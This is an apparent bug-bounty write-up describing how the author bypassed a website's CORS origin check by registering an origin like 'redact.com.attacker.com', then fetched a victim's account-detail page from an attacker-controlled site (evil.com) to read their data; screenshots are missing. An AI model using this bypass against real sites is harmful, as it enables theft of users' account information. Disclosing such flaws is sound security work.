Hello friends this write-up is about how I bypassed the CORS validation. Let assume the website name redact.com. Simply I logged into the website checked for CSRF attack but there was a Current Password pram which means if I am able to bypass, there is a CSRF protection. I still need the victim’s current password to exploit it

Then I saw..

Access-Control-Allow-Origin: https://redact.com

Access-Control-Allow-Credentials: true

I tried to set the attacker.com in the Origin header but didn’t worked out I tried by adding another Origin header it also failed basically the server was checking the Origin header value like this

Image for post
Image for post

So we can simply trick the server to bypass that validation by setting the Origin header value to redact.com.attacker.com.

Image for post
Image for post

Simply tried this on the redact.com & it worked.

Image for post
Image for post

Loading the Account-Detail page from Evil origin to steal the information

Image for post
Image for post

Send that fetch request to steal the account information page & display it on the evil.com

Boom data steal I hope you guys like it.

./LOGOUT

Written by

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store